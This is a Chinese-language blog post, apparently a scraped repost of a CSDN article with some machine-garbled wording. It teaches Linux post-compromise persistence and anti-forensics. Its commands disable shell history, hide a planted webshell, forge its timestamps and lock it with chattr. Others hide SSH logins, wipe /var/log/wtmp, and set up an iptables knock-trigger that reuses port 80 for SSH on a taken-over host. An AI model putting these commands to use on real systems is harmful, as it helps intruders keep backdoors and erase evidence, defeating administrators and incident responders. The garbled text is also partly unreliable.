首页 » 网站推广 » phpchattr技巧_Linux权限坚持隐藏踪迹篇

phpchattr技巧_Linux权限坚持隐藏踪迹篇

访客 2024-11-21 0

扫一扫用手机浏览

文章目录 [+]

#禁用历史记录功能[space]set +o history备注:[space] 表示空格。
并且由于空格的缘故,该命令本身也不会被记录#重新开启历史记录功能[space]set -o history#删除详细的某个记录history -d 数组

上面的命令会临时禁用历史功能,这意味着在这命令之后你实行的所有操作都不会记录到历史记录中

隐蔽文件/文件夹

1. 创建隐蔽文件或者文件夹

phpchattr技巧_Linux权限坚持隐藏踪迹篇

touch .123.txtmkdir .a#文件名/夹前面加一个 点 就代表是隐蔽文件/夹

phpchattr技巧_Linux权限坚持隐藏踪迹篇
(图片来自网络侵删)
修正文件韶光戳

linux下藏后门必须要修正韶光,否则很随意马虎被创造,直策应用 touch 就可以了。
假设我们上传了一个隐蔽后门.webshell.php

1. 上传后门

明显看到.webshell.php韶光戳不一样,ls-al,查看到的韶光为文件修正的韶光

我们还可以利用stat命令来查看文件详细的韶光戳

stat 文件名

在Linux中,没有文件创建韶光的观点。
只有文件的访问韶光、修正韶光、状态改变韶光。
也便是说不能知道文件的创建韶光。
但如果文件创建后就没有修正过,修正韶光=创建韶光

stat查看韶光戳有三种韶光属性

2. 修正韶光戳

直策应用 touch 就可以,比如参考 index.php 的韶光,再赋给 .webshell.php,结果两个文件的韶光就一样了

touch -r index.html .webshell.php

连接webshell,可见隐蔽文件也可以进行连接的。

隐蔽权限

在Linux中,利用chattr命令来防止root和其他管理用户误删除和修正主要文件及目录,此权限用ls -l是查看不出来的,从而达到隐蔽权限的目的。

这个技巧常被用在后门,变成了一些难以打消的后门文件。

chattr +i .webshell.php 锁定文件,此时无法查看lsattr .webshell.php 属性查看chattr -i .webshell.php 解除锁定rm -rf .webshell.php 删除文件

隐蔽远程SSH上岸记录

在linux中可以利用last查看账号ssh登录情形

last|grep root

当我们用ssh进行登录时,就会记录,信息包括登录的账号,远程登录的主机,登录韶光

ssh加上-T参数,可以进行隐蔽登录记录,不被w、who、last等指令检测到

ssh -T -i id_rsa root@192.168.110.131 /bin/bash -i打消last记录

echo “”>/var/log/wtmp

此时即看不到用户登录信息

端口复用

端口复用是指不同的运用程序利用相同端口进行通讯。
我们可以通过端口复用来达到隐蔽端口的目的。
其他浸染还有很多,如内网渗透中,搭建隧道时,做事器仅许可指定的端口对外开放。
利用端口复用可以将3389或22等端口转发到如80端口上,以便外部连接。

1. 利用IPTables进行端口复用

假设主机开放的web做事是80端口,在被拿下的主机上实行如下命令

# 创建端口复用链iptables -t nat -N LETMEIN# 创建端口复用规则,将流量转发至 22 端口iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22#开启开关,如果吸收到一个含有 threathuntercoming 的 TCP 包,则将来源 IP 添加到加为 letmein 的列表中iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT#关闭开关,如果吸收到一个含有 threathunterleaving 的 TCP 包,则将来源 IP 从 letmein 的列表中移除iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT# let's do it,如果创造 SYN 包的来源 IP 处于 letmein 列表中,将跳转到 LETMEIN 链进行处理,有效韶光为 3600 秒iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

攻击者的linux系统上实行如下

#开启复用echo threathuntercoming | socat - tcp:192.168.110.131:80#ssh利用80端口进行登录ssh -p 80 root@192.168.110.131 -T /bin/bash -i#关闭复用,此时不能用80端口进行ssh连接echo threathunterleaving | socat - tcp:192.168.110.131:80

连接目标80端口成功连接ssh

ps:进行端口复用后同时也可以用默认的22端口进行ssh连接

原文链接:https://blog.csdn.net/qq_44159028/article/details/124196458

标签:

相关文章

php_alert_back技巧_ELKelastalert 日志告警

php_alert_back技巧_ELKelastalert 日志告警

当一个规则匹配触发,就会给到一个或者多个的告警,这些告警具体会根据规则的配置来选择告警路子,便是告警行为,比如邮件、钉钉、tg、s...

网站推广 2024-12-17 阅读0 评论0
«    2024年12月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031